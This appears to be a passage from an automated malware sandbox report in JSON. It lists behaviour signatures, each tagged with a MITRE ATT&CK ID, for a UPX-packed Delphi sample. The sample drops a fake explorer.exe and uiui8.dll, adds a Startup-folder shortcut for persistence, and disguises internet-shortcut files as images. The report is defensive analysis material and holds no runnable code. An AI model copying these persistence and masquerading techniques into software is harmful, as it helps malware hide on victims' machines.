c:\\qdcrwv.txt & %PUBLIC%\\Desktop\\Intennet Exploner.lnk (UID: 00000000-00005848)\n \"explorer.exe\" called \"MoveFileA\" with parameter c:\\gbvxvm.jpg & %PUBLIC%\\Desktop\\ (UID: 00000000-00005848)\n \"explorer.exe\" called \"MoveFileA\" with parameter c:\\mfvqlr.bmp & %PUBLIC%\\Desktop\\ (UID: 00000000-00005848)\n \"explorer.exe\" called \"MoveFileA\" with parameter c:\\ttdmri.gif & %PUBLIC%\\Desktop\\ (UID: 00000000-00005848)", "origin": "API Call", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a\" has an writable section named \"UPX0\"\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a\" has an writable section named \"UPX1\"\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a\" has an writable section named \".rsrc\"\n \"explorer.exe\" has an writable section named \"UPX0\"\n \"explorer.exe\" has an writable section named \"UPX1\"\n \"explorer.exe\" has an writable section named \".rsrc\"\n \"uiui8.dll\" has an writable section named \"DATA\"\n \"uiui8.dll\" has an writable section named \"BSS\"\n \"uiui8.dll\" has an writable section named \".idata\"\n \"DISMHOST.EXE.67A9C787.bin\" has an writable section named \".data\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"explorer.exe\" (UID: 00000000-00005848)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"explorer.exe\" (UID: 00000000-00005848)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a\" was detected as \"UPX\" and name: \"Packer\"\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a\" was detected as \"Borland Delphi\" and name: \"Compiler\"\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a\" was detected as \"Turbo Linker\" and name: \"Linker\"\n \"explorer.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"explorer.exe\" was detected as \"Borland Delphi\" and name: \"Compiler\"\n \"explorer.exe\" was detected as \"Turbo Linker\" and name: \"Linker\"\n \"uiui8.dll\" was detected as \"UPX\" and name: \"Packer\"\n \"uiui8.dll\" was detected as \"Borland Delphi\" and name: \"Compiler\"\n \"uiui8.dll\" was detected as \"Turbo Linker\" and name: \"Linker\"\n \"DISMHOST.EXE.67A9C787.bin\" was detected as \"UPX\" and name: \"Packer\"\n \"DISMHOST.EXE.67A9C787.bin\" was detected as \"Borland Delphi\" and name: \"Compiler\"\n \"DISMHOST.EXE.67A9C787.bin\" was detected as \"Turbo Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-154", "name": "File contains dynamic base/NX flags", "description": "\"DISMHOST.EXE.67A9C787.bin\" has flags like IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE\n IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE\n IMAGE_DLLCHARACTERISTICS_NX_COMPAT", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a\" has an executable section named \"UPX0\"\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a\" has an executable section named \"UPX1\"\n \"explorer.exe\" has an executable section named \"UPX0\"\n \"explorer.exe\" has an executable section named \"UPX1\"\n \"uiui8.dll\" has an executable section named \"CODE\"\n \"DISMHOST.EXE.67A9C787.bin\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-146", "name": "PE file contains Debug data directory", "description": "\"DISMHOST.EXE.67A9C787.bin\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"explorer.exe\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"uiui8.dll\" was detected as \"Borland Delphi 6.0-7.0\"\n \"DISMHOST.EXE.67A9C787.bin\" was detected as \"Visual C++ 2005 Release -> Microsoft\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-56", "type": 8, "name": "Drops files with image extension", "description": "\"mfvqlr.bmp\" has type \"MS Windows 95 Internet shortcut text ASCII text with CRLF line terminators\" and extension \"bmp\"\n \"gbvxvm.jpg\" has type \"MS Windows 95 Internet shortcut text ASCII text with CRLF line terminators\" and extension \"jpg\"\n \"ttdmri.gif\" has type \"MS Windows 95 Internet shortcut text ASCII text with CRLF line terminators\" and extension \"gif\"", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" trying to access non-existent file \"C:\\CRYPTBASE.dll\"\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" trying to access non-existent file \"C:\\ntmarta.dll\"\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" trying to access non-existent file \"C:\\Program Files\\Common Files\\Microsoft Shared\\explorer.exe\"\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" trying to access non-existent file \"C:\\Program.exe\"\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" trying to access non-existent file \"C:\\Program Files\\Common.exe\"\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" trying to access non-existent file \"C:\\Program Files\\Common Files\\Microsoft.exe\"\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" trying to access non-existent file \"C:\\CRYPTBASE.DLL\"\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" trying to access non-existent file \"C:\\NTMARTA.DLL\"\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" trying to access non-existent file \"C:\\Program Files\\Common Files\\microsoft shared\\EXPLORER.EXE\"\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" trying to access non-existent file \"C:\\PROGRAM.EXE\"\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" trying to access non-existent file \"C:\\Program Files\\COMMON.EXE\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" reads file \"c:\\program files\\desktop.ini\"\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" reads file \"c:\\1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\"\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" reads file \"c:\\program files\\common files\\microsoft shared\\explorer.exe\"\n \"explorer.exe\" reads file \"c:\\program files\\desktop.ini\"\n \"explorer.exe\" reads file \"c:\\users\\desktop.ini\"\n \"explorer.exe\" reads file \"c:\\users\\public\\desktop.ini\"\n \"explorer.exe\" reads file \"c:\\users\\public\\desktop\\desktop.ini\"\n \"explorer.exe\" reads file \"c:\\programdata\\microsoft\\windows\\start menu\\desktop.ini\"\n \"explorer.exe\" reads file \"c:\\programdata\\microsoft\\windows\\start menu\\programs\\desktop.ini\"\n \"explorer.exe\" reads file \"c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" connecting to \"\\ThemeApiPort\"\n \"explorer.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Caches\"\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Caches\"\n \"explorer.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Caches\"\n \"explorer.exe\" touched file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\1681.lnk\"\n \"explorer.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Caches\"\n \"explorer.exe\" touched file \"%ALLUSERSPROFILE%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\1681.lnk\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"\"; Value: \"\")\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\"; Key: \"\"; Value: \"\")\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\DIAGNOSTICS\"; Key: \"\"; Value: \"\")\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\ERROR MESSAGE INSTRUMENT\"; Key: \"\"; Value: \"\")\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"\"; Value: \"\")\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"\"; Value: \"\")\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IME COMPATIBILITY\"; Key: \"\"; Value: \"\")\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"\"; Value: \"\")\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-235", "type": 6, "relevance": 1, "name": "Queries basic information of the specified process", "description": "\"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" queries basic process information of the \"C:\\1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" (UID: 5784)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"explorer.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSAPPCOMPAT\"; Value: \"\")\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSUSERENABLED\"; Value: \"\")\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"1BD3A3308A88F2A208D59BD22635B6C3EEF8C434D8058947FD8CBF8615DCE24A\"; Value: \"\")\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORUSESYSTEMHEAP\"; Value: \"\")\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORSYSTEMHEAPISPRIVATE\"; Value: \"\")\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\"; Value: \"\")\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\SETUP\"; Key: \"OOBEINPROGRESS\"; Value: \"\")\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\SETUP\"; Key: \"SYSTEMSETUPINPROGRESS\"; Value: \"\")\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{905E63B6-C1BF-494E-B29C-65B732D3D21A}\"; Key: \"CATEGORY\"; Value: \"\")\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{905E63B6-C1BF-494E-B29C-65B732D3D21A}\"; Key: \"NAME\"; Value: \"\")\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{905E63B6-C1BF-494E-B29C-65B732D3D21A}\"; Key: \"PARENTFOLDER\"; Value: \"\")\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{905E63B6-C1BF-494E-B29C-65B732D3D21A}\"; Key: \"DESCRIPTION\"; Value: \"\")\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{905E63B6-C1BF-494E-B29C-65B732D3D21A}\"; Key: \"RELATIVEPATH\"; Value: \"\")\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{905E63B6-C1BF-494E-B29C-65B732D3D21A}\"; Key: \"PARSINGNAME\"; Value: \"\")\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{905E63B6-C1BF-494E-B29C-65B732D3D21A}\"; Key: \"INFOTIP\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" trying to touch file \"C:\\1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a\"\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" trying to touch file \"d:\"\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" trying to touch file \"e:\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" trying to access non-existent file \"C:\\1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a\"\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" trying to access non-existent file \"d:\"\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" trying to access non-existent file \"e:\"\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" trying to access non-existent file \"f:\"\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" trying to access non-existent file \"g:\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-113", "type": 6, "relevance": 5, "name": "Touches files in program files directory", "description": "\"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" touched file \"C:\\Program Files\\Common Files\\microsoft shared\\explorer.exe\"\n \"explorer.exe\" touched file \"C:\\Program Files\\Common Files\\uiui8.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" writes file \"c:\\program files\\common files\\microsoft shared\\explorer.exe\"\n \"explorer.exe\" writes file \"c:\\qdcrwv.txt\"\n \"explorer.exe\" writes file \"c:\\gbvxvm.jpg\"\n \"explorer.exe\" writes file \"c:\\mfvqlr.bmp\"\n \"explorer.exe\" writes file \"c:\\ttdmri.gif\"\n \"explorer.exe\" writes file \"c:\\program files\\common files\\uiui8.dll\"\n \"explorer.exe\" writes file \"c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\1681.lnk\"\n \"explorer.exe\" writes file \"c:\\mfiles\\winlogon.exe\"\n \"explorer.exe\" writes file \"%commonprogramfiles%\\microsoft shared\\explorer.exe\"\n 